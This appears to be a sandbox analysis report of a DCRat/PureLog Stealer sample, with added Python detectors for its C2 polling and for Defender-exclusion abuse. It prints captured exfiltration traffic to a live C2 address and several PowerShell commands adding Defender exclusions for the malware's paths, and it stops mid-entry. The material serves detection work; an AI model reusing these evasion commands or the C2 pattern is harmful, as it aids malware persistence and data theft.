                                                                                                Jan 10, 2025 07:59:15.094574928 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:15.439156055 CET | 2544 | OUT | Data Raw: 5c 54 43 50 5e 57 56 51 58 5b 57 56 50 53 5b 56 55 50 5e 5f 54 5b 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TCP^WVQX[WVPS[VUP^_T[Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,Y(?P8/&+>8^+^ #'?+(=6&;&:'_!/Y.
                                                                                                Jan 10, 2025 07:59:15.958376884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:16.088973045 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0
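Read together, sessions 110 to 117 are one C2 polling loop: eight POSTs in under six seconds to the same 15-segment .php path on 89.23.100.242, each with a browser User-Agent but an application/octet-stream body of about 2.5 KB, each sent with Expect: 100-continue (the 25-byte IN records are just the interim "HTTP/1.1 100 Continue" line), and each answered with a chunked 4-byte body ("=V@["). The captured body prefixes are also telling: every byte lies between 0x43 and 0x5f, so the "binary" upload is really printable, low-entropy encoded text, and from offset 24 onward all eight bodies are identical. The script below scores exactly those traits over records constructed from the session table above. It is an added example, not part of the Joe Sandbox report or of the sample: the body bytes are the "Data Raw" prefixes reassembled as a per-request head plus the shared tail, session 112's reply size is taken from its chunk-size line (0x98), session 111 has no recorded reply, and every threshold is an illustrative choice rather than a Joe Sandbox rule.

```python
"""Beacon heuristics over the HTTP sessions captured above (added example)."""
import math
import statistics
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class HttpSession:
    session_id: int
    request_time: str               # HH:MM:SS.fraction of the request line (CET)
    method: str
    path: str
    user_agent: str
    content_type: str
    content_length: int
    body_prefix: bytes              # captured start of the POST body
    response_length: Optional[int]  # de-chunked reply size, None if none was captured


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29")
PATH = ("/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/"
        "CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/"
        "AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/"
        "imageJavascriptprocessDefaultsqltest.php")
# Bytes 24.. of every captured body prefix on this page are identical (58 bytes).
TAIL = bytes.fromhex("52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f "
                     "5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50")


def _body(head_hex: str) -> bytes:
    """Per-request 24-byte head (from the Data Raw line) followed by the shared tail."""
    return bytes.fromhex(head_hex) + TAIL


# Constructed from the session table above; only the first 24 body bytes differ per request.
OCTET = "application/octet-stream"
SESSIONS = [
    HttpSession(110, "07:59:09.366720915", "POST", PATH, UA, OCTET, 2544,
                _body("59 5f 43 55 5e 5a 53 53 58 5b 57 56 50 58 5b 50 55 50 5e 5e 54 50 51 5d"), 4),
    HttpSession(111, "07:59:10.410666943", "POST", PATH, UA, OCTET, 2544,
                _body("5c 51 43 5f 5b 5b 56 55 58 5b 57 56 50 5e 5b 55 55 57 5e 59 54 51 51 5a"), None),
    HttpSession(112, "07:59:10.976708889", "POST", PATH, UA, OCTET, 2036,
                _body("5c 54 43 5e 5e 58 56 52 58 5b 57 56 50 52 5b 56 55 52 5e 5b 54 59 51 52"), 0x98),
    HttpSession(113, "07:59:11.101484060", "POST", PATH, UA, OCTET, 2544,
                _body("59 5f 43 56 5e 5e 56 54 58 5b 57 56 50 5a 5b 57 55 50 5e 5e 54 5f 51 53"), 4),
    HttpSession(114, "07:59:12.049834013", "POST", PATH, UA, OCTET, 2544,
                _body("5c 55 43 53 5e 5b 56 5e 58 5b 57 56 50 59 5b 56 55 5d 5e 58 54 58 51 53"), 4),
    HttpSession(115, "07:59:13.065357924", "POST", PATH, UA, OCTET, 2536,
                _body("5c 55 46 57 5b 5b 56 51 58 5b 57 56 50 5b 5b 55 55 5d 5e 5a 54 5b 51 58"), 4),
    HttpSession(116, "07:59:14.079814911", "POST", PATH, UA, OCTET, 2536,
                _body("5c 56 46 50 5e 5e 56 52 58 5b 57 56 50 5b 5b 50 55 54 5e 5d 54 58 51 5d"), 4),
    HttpSession(117, "07:59:15.094574928", "POST", PATH, UA, OCTET, 2544,
                _body("5c 54 43 50 5e 57 56 51 58 5b 57 56 50 53 5b 56 55 50 5e 5f 54 5b 51 5b"), 4),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8 for encrypted or compressed data, well below 5 for encoded text."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def constant_offsets(bodies: List[bytes]) -> List[int]:
    """Offsets (within the shortest body) at which every body carries the same byte."""
    n = min(len(b) for b in bodies)
    return [i for i in range(n) if len({b[i] for b in bodies}) == 1]


def common_suffix_len(bodies: List[bytes]) -> int:
    n, k = min(len(b) for b in bodies), 0
    while k < n and len({b[-1 - k] for b in bodies}) == 1:
        k += 1
    return k


def seconds(hms: str) -> float:
    h, m, s = hms.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def median_interval(sessions: List[HttpSession]) -> float:
    t = sorted(seconds(s.request_time) for s in sessions)
    return statistics.median(b - a for a, b in zip(t, t[1:]))


def assess(sessions: List[HttpSession], window_s: float = 10.0, min_posts: int = 5) -> List[str]:
    """Return every beacon indicator that fires for the busiest POST URL in the capture."""
    posts = [s for s in sessions if s.method == "POST"]
    if not posts:
        return []
    path, hits = Counter(s.path for s in posts).most_common(1)[0]
    same = sorted((s for s in posts if s.path == path), key=lambda s: seconds(s.request_time))
    reasons = []
    span = seconds(same[-1].request_time) - seconds(same[0].request_time)
    if hits >= min_posts and span <= window_s:
        reasons.append(f"{hits} POSTs to one URL within {span:.1f}s")
    segments = [p for p in path.split("/") if p]
    if len(segments) >= 8 and path.endswith(".php"):
        reasons.append(f"{len(segments)}-segment path ending in .php")
    if all(s.content_type == OCTET and "Mozilla/" in s.user_agent for s in same):
        reasons.append("browser User-Agent sending application/octet-stream bodies")
    lengths = [s.content_length for s in same]
    if max(lengths) - min(lengths) <= 0.25 * max(lengths):
        reasons.append(f"near-constant Content-Length ({min(lengths)}-{max(lengths)})")
    bodies = [s.body_prefix for s in same if s.body_prefix]
    joined = b"".join(bodies)
    if joined and all(0x20 <= c < 0x7f for c in joined) and shannon_entropy(joined) < 5.0:
        reasons.append(f"octet-stream body is printable text at {shannon_entropy(joined):.2f} bits/byte")
    if len(bodies) >= 2 and len(constant_offsets(bodies)) >= 0.5 * min(map(len, bodies)):
        reasons.append(f"{len(constant_offsets(bodies))}/{min(map(len, bodies))} body bytes fixed across requests")
    tiny = sum(1 for s in same if s.response_length is not None and s.response_length <= 8)
    if tiny >= len(same) / 2:
        reasons.append(f"{tiny}/{len(same)} replies are 8 bytes or less")
    if len(same) >= 3 and 0.5 <= median_interval(same) <= 5.0:
        reasons.append(f"median gap between requests {median_interval(same):.2f}s")
    return reasons


if __name__ == "__main__":
    for reason in assess(SESSIONS):
        print("-", reason)
```

The invariant region is the part worth keying a content signature on: the varying head changes every request, the 58-byte tail does not, and a rule anchored on the tail survives the changing head without depending on the URL, which DCRat builders randomise per sample. The entropy and printable-range checks are the cheap first filter; genuine octet-stream uploads (archives, images, protobuf) sit near 8 bits per byte and fail the printable test immediately.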



                                                                                                Target ID:0
                                                                                                Start time:01:56:58
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\Desktop\hz7DzW2Yop.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\hz7DzW2Yop.exe"
                                                                                                Imagebase:0x900000
                                                                                                File size:2'926'873 bytes
                                                                                                MD5 hash:46DCDDD43CBAEAE845C14E7306726FF2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:01:56:59
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
                                                                                                Imagebase:0xf00000
                                                                                                File size:147'456 bytes
                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:01:57:14
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:01:57:14
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:01:57:15
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\HyperWebbroker/serverBrokerperfMonitor.exe"
                                                                                                Imagebase:0xfe0000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:21
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:22
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:23
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:24
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:25
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:26
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:27
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:28
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:29
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:30
                                                                                                Start time:01:57:19
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:32
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
                                                                                                Imagebase:0x7ff6d03a0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:33
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:35
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Imagebase:0x500000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 68%, ReversingLabs
                                                                                                Has exited:true

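The process list above shows the defence-evasion pattern in full: five powershell.exe instances (targets 21, 22, 24, 26, 28) each add a Windows Defender exclusion for a single executable in a non-standard location, and a few seconds later one of those excluded paths, C:\Recovery\uAsLgsGzSk.exe, is launched as target 35. The following is an added detection example, not code from the sample or from Joe Sandbox: it runs over process-creation events constructed from the command lines in this report (ids reuse the report's Target IDs and are not real PIDs), decodes a base64 -EncodedCommand variant (a constructed event, added because the report's Sigma hit covers that form; it was not observed in this run), scores each exclusion, and correlates exclusions with later executions of the excluded path. A benign folder exclusion for a hypothetical Docker install is included as a control.

```python
"""Detect Defender-exclusion abuse and exclude-then-execute chains in process-creation logs.

Added example: a rule an analyst might run over Sysmon/4688-style process events,
not code from the sample or from Joe Sandbox. Sample events below are constructed
from the report's process list; ids reuse its Target IDs and are not real PIDs.
"""
import base64
import re
from typing import Dict, List, Tuple

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def ps_exclusion(path: str) -> str:
    """Build the Add-MpPreference command line in the form the report shows."""
    return '"powershell" -Command Add-MpPreference -ExclusionPath ' + "'" + path + "'"


# Constructed (assumption): the same cmdlet delivered via -EncodedCommand, the form the
# report's Sigma rule names; not observed in this run.
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\svc.exe'".encode("utf-16le")
).decode("ascii")

EVENTS: List[Dict[str, object]] = [
    {"id": 21, "image": PS, "cmdline": ps_exclusion(r"C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe")},
    {"id": 22, "image": PS, "cmdline": ps_exclusion(r"C:\Recovery\uAsLgsGzSk.exe")},
    {"id": 24, "image": PS, "cmdline": ps_exclusion(r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe")},
    {"id": 26, "image": PS, "cmdline": ps_exclusion(r"C:\Recovery\SystemSettings.exe")},
    {"id": 28, "image": PS, "cmdline": ps_exclusion(r"C:\Recovery\uAsLgsGzSk.exe")},
    {"id": 32, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"'},
    {"id": 35, "image": r"C:\Recovery\uAsLgsGzSk.exe", "cmdline": r"C:\Recovery\uAsLgsGzSk.exe"},
    {"id": 36, "image": r"C:\Windows\System32\chcp.com", "cmdline": "chcp 65001"},
    # Constructed benign control: a folder exclusion for a (hypothetical) product install.
    {"id": 90, "image": PS, "cmdline": ps_exclusion(r"C:\Program Files\Docker")},
    {"id": 99, "image": PS, "cmdline": "powershell -EncodedCommand " + ENCODED},
]

EXCL_RE = re.compile(r"-ExclusionPath\s+(?:'([^']+)'|\"([^\"]+)\"|(\S+))", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Directories where a freshly excluded binary is a red flag (user-writable or recovery).
LOW_TRUST = (r"c:\recovery", r"c:\users\public", r"\appdata\local\temp", r"c:\programdata")


def _norm(path: str) -> str:
    return path.strip().rstrip("\\").lower()


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded payload of a -EncodedCommand (base64 of UTF-16LE) to the cmdline."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        payload = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + payload


def exclusion_paths(cmdline: str) -> List[str]:
    """Paths passed to Add-MpPreference -ExclusionPath, whether plain or base64-encoded."""
    text = decode_encoded_command(cmdline)
    if "add-mppreference" not in text.lower():
        return []
    return [next(g for g in m.groups() if g) for m in EXCL_RE.finditer(text)]


def classify_exclusion(path: str) -> List[str]:
    """Reasons an exclusion looks like defence evasion; an empty list means no finding."""
    p = _norm(path)
    reasons = []
    if p.endswith((".exe", ".dll", ".bat", ".vbe", ".vbs", ".ps1")):
        reasons.append("excludes a single executable or script rather than a product folder")
    if any(d in p for d in LOW_TRUST):
        reasons.append("path is under a user-writable or recovery directory")
    return reasons


Finding = Tuple[int, str, str, str]


def correlate(events: List[Dict[str, object]]) -> List[Finding]:
    """Flag suspicious exclusions and any later process whose image path was excluded first."""
    findings: List[Finding] = []
    excluded_by: Dict[str, int] = {}  # normalised path -> first event that excluded it
    for ev in events:
        eid, image, cmdline = int(ev["id"]), str(ev["image"]), str(ev["cmdline"])
        for path in exclusion_paths(cmdline):
            excluded_by.setdefault(_norm(path), eid)
            reasons = classify_exclusion(path)
            if reasons:
                findings.append((eid, "exclusion", path, "; ".join(reasons)))
        origin = excluded_by.get(_norm(image))
        if origin is not None and origin != eid:
            findings.append((eid, "exec_after_exclusion", image, f"excluded by target {origin}"))
    return findings


if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

Run against the constructed events, every Add-MpPreference call in the report is flagged (each excludes one .exe, and the C:\Recovery ones trip the low-trust rule as well), the Docker folder exclusion is not, and target 35 is reported as an execution of a path that target 22 had excluded moments earlier. On a live host the same correlation can be made against Defender's own event 5007 (configuration change) rather than the command line, which also catches exclusions added through the GUI or Set-MpPreference.
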
                                                                                                Target ID:36
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:chcp 65001
                                                                                                Imagebase:0x7ff6fb1e0000
                                                                                                File size:14'848 bytes
                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:37
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\uAsLgsGzSk.exe
                                                                                                Imagebase:0xd10000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:38
                                                                                                Start time:01:57:21
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                Imagebase:0x7ff64bd10000
                                                                                                File size:108'032 bytes
                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:41
                                                                                                Start time:01:57:26
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:42
                                                                                                Start time:01:57:27
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
                                                                                                Imagebase:0xbc0000
                                                                                                File size:2'639'872 bytes
                                                                                                MD5 hash:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
